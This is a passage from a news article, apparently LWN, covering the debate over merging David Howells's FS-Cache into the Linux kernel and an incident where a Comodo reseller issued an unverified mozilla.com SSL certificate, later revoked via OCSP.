reboots, allowing some files to live locally for a very long time.


But, Howells already has a fairly large, intrusive patch that is headed for
2.6.29: 
credentials.  That patch
touches a lot of code in the kernel, in particular the VFS layer. Christoph
Hellwig is 
concerned about both credentials and FS-Cache
going in at the same time :

I don't think we want fscache for .29 yet.  I'd rather let the
credential code settle for one release, and have more time for actually
reviewing it properly and have it 100% ready for .30.


While that would delay the addition of FS-Cache, Andrew Morton has a larger concern:

I don't believe that it has yet been convincingly demonstrated that we
want to merge it at all.

It's a huuuuuuuuge lump of new code, so it really needs to provide
decent value.  Can we revisit this?  Yet again?  What do we get from
all this?


Morton is worried about adding additional maintenance headaches with
no—or limited—benefits.  Using a local disk to cache data from
a remote disk is only useful in some scenarios; it can certainly make
things worse in others.  As Howells puts
it: "It's a compromise: a trade-off between the loading and
latencies of your 
network vs the loading and latencies of your disk; you sacrifice disk space to
make up for the deficiencies of your network."  What Morton is
looking for is a push from users, be that
end users or distributions that 
are shipping the feature.  He would also like to see some benchmarks that
show what gain there is when using FS-Cache.


Howells has patiently answered these concerns, pointing at some benchmarks he had posted in
November that showed some significant savings.  The benchmarks used NFS
over a deliberately slow link (to simulate a heavily used network) and
showed a huge decrease in the time required to read a large file, but was
essentially break-even when operating on a kernel tree.  In the kernel tree
benchmark, though, the reduction in network traffic was significant.


More importantly, perhaps, is the fact that Red Hat has shipped FS-Cache in
RHEL 5 and there are customers using it, as well as customers interested in
using it as Howells pointed out:

We (Red Hat) have shipped it in RHEL-5 and some Fedora releases.  Doing so is
quite an effort, though, precisely because the code is not yet upstream.  We
have customers using it and are gaining more customers who want it.  There
even appear to be CentOS users using it (or at least complaining when it
breaks).


While shipping out-of-tree code is no guarantee that the feature will get
merged—AppArmor is an excellent counterexample—actual users
whose needs are being met by a particular feature are a fairly
persuasive argument.  Howells outlines some
customer use cases for FS-Cache, for example:

 We have a number of customers in the entertainment industry who use or
     would like to use this caching infrastructure in their render farms.  They
     use NFS to distribute textures (say a million and a quarter files) to the
     individual rendering units.  FS-Cache allows them to reduce the network
     load by satisfying subsequent NFS READ requests from each rendering unit's
     local cache rather than having to go to the network again.


In all, it would seem that Morton's concerns were addressed.  Whether that
means the path is clear for 2.6.30 or these or other concerns will
come to the fore is a question that will likely have to wait another three
months or so. 


		SSL man-in-the-middle attacks


A while back, we looked at the
new Firefox 3 warnings for self-signed and expired SSL certificates.
As annoying as some found those to be, it certainly increased the
visibility of "invalid" certificates.  Those certificates could lead to
man-in-the-middle attacks, which is what led Mozilla to issue such
eye-opening warnings.  More recently, Eddy Nigg of Startcom—issuer of
free SSL certificates—found another way to do man-in-the-middle 
attacks without setting off any of the new warnings.


What Nigg found was that he could get a perfectly valid certificate for a
domain he did not control: in this case mozilla.com.  He could
then masquerade as the secure Mozilla site with impunity; any browsers that
landed 
there would verify the certificate as belonging to mozilla.com.
He did it through a Comodo reseller with no questions asked: "Five
minutes later I was in the possession of a 
legitimate certificate issued to mozilla.com – no questions asked
– no 
verification checks done – no control validation – no subscriber agreement
presented, nothing."


That is clearly a bug in the verification process, but it is completely out
of the control of the browser.  The browser must trust some set of key
signing authorities (i.e. Certificate Authorities or CAs), but has no way
to control how well or poorly they actually vet the keys they sign—or
their downstream resellers sign.  We saw the same potential problem in a
slightly different guise with
"Extended Validation" certificates back in
2006.  It all comes down to trusting CAs.


Sometime after Nigg's story hit Slashdot, Comodo revoked the certificate,
which did cause Firefox to put up an error and disallow the
connection.  One wonders how many bad certificates have been issued but not
revoked because a phisher or other scammer received them.  One would think
those folks would be less likely to publicly announce what they had done.


Bringing attention to the problem will likely help, but there are just
too many ways to create bad SSL certificates for those that really want
them—bribing CA employees 
if nothing else.  Another useful outcome is that
Richard Bejtlich got interested in just how the revocation process works.
He collected packet data from accessing Nigg's certificate after it had
been revoked which gives look
inside the Online Certificate Status Protocol (OCSP).


OCSP
is designed to do just what it did, cause a bad certificate to fail when
verified by the browser.  Nigg's certificate listed an OCSP server that
should be consulted.  Because that information has been signed by the CA,
it can't be tampered with.  So long as the browser makes the OCSP check,
certificates can be revoked in this manner—as long as the CA is aware
that revocation is needed.


Public key cryptography—the basis of SSL and many other encryption
schemes—is an amazing method for doing encryption, but 
it does suffer from a major shortcoming: key exchange.  For relatively
simple situations, where both parties know each other and have a way to
securely exchange keys, it works well.  When trying to handle
other kinds of communications, either a "web of trust" (a la PGP and
GPG) or some kind of trusted authority is required.  When those break down,
man-in-the-middle and other scams are possible.